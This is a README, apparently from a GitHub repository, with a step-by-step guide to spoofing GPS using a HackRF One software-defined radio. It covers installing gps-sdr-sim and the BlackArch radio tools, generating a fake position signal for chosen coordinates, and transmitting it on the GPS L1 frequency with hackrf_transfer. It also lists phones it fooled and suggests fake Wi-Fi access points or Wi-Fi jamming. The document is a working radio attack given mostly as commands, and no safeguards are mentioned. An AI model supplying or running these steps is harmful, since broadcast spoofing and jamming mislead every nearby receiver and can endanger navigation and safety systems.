README.md |
gps_spoofing
How to fool your GPS enabled devices using Software Defined Radio, in this case using the HackRF One. This guide is written for Arch linux. But should be relatively consistent with other platforms.
Installing on Debian
HackRF Support
$ sudo apt-update
$ sudo apt install gnuradio libhackrf0 hackrf libhackrf-dev
Hook up your HackRF and see if its recognized:
$ hackrf_info
You should see something like:
Found HackRF board.
Board ID Number: 2 (HackRF One)
Firmware Version: 2015.07.2
Part ID Number: 0xa000cw898 0x09898908 (redacted)
Serial Number: 000000000 0000 00 00000000 (redacted
GPS sim (Download + compile)
$ git clone https://github.com/osqzss/gps-sdr-sim.git
$ cd gps-sdr-sim
$ make
Making gps sim only takes a few seconds.
Installing on Arch
you could build gps-sdr-sim from scratch, but I choose to use the binary provided by the 'blackarch' distro's repository.
Prerequisits
$ curl -O https://blackarch.org/strap.sh
$ chmod +x strap.sh
$ sudo ./strap.sh (installing the keyring step takes a few minutes)
$ sudo pacman -Syyu (update pacman sources etc. although stap.sh already seems to take care of this)
$ sudo pacman -S blackarch-radio (just install all the radio stuff (1Gb))
$ sudo modprobe hackrf (load the hackrf kernel module/driver)
$ hackrf_info (see if you can see your hack rf one)
Generate simulated motion file
Download the latest brdc file from here: ftp://cddis.gsfc.nasa.gov/gnss/data/daily (for example: ftp://cddis.gsfc.nasa.gov/gnss/data/daily/2020/brdc/brdc1460.20g.Z)
Extract the compressed file in a place you will remember
Generate binary file to be transmitted by hackrf:
$ ./gps-sdr-sim -b 8 -e ~/LOCATION_OF_YOUR_BRDC/brdc1460.20n -l 45.803304,12.133697,100
The default option generates a 300sec (5 min) 'motion' file. This can be increased by using using the '-d' option. The last part is the location of your choosing (lat, long, altitude). This will run for 300 seconds and generate a 'gpssim.bin' file. NOTE the lat/long/alt should not contain any spaces, only commas.
Spoof location
To transmit your spoofed gps position using the hackrf use the follwing command:
$ hackrf_transfer -t ~/LOCATION_OF_YOUR_BIN_FILE/gpssim.bin -f 1575420000 -s 2600000 -a 1 -x 0
The motion file only simulates for a given period (-d), luckily hackrf_transfer can repeat the transmission with the '-R' switch! (see: https://www.blackhat.com/docs/eu-15/materials/eu-15-Kang-Is-Your-Timespace-Safe-Time-And-Position-Spoofing-Opensourcely-wp.pdf)
Enjoy!
Test results
Vulnurable devices tested (no need to switch of wifi, gsm etc, works out of the box):
- iPhone 6, running iOS 12.4.4
- Samsung s10e, running Anroid 10
- Samsung Tab A SM-T380 (tablet), Android 9
- Samsung S7, running Android 8.0.0 (Samsung Experience 9.0), ONLY WITH WIFI DISABLED!
Not Vulnurable (also not with wifi disabled):
- iPhone SE (2nd gen)
- iPhone X
Improvements / Ideas
- Combine with fake wifi access points from desired location geo-ap database such as WiGLE (https://api.wigle.net/) or here https://www.mylnikov.org/archives/1170
- Or just jam wifi alltogether (dani ploeger)?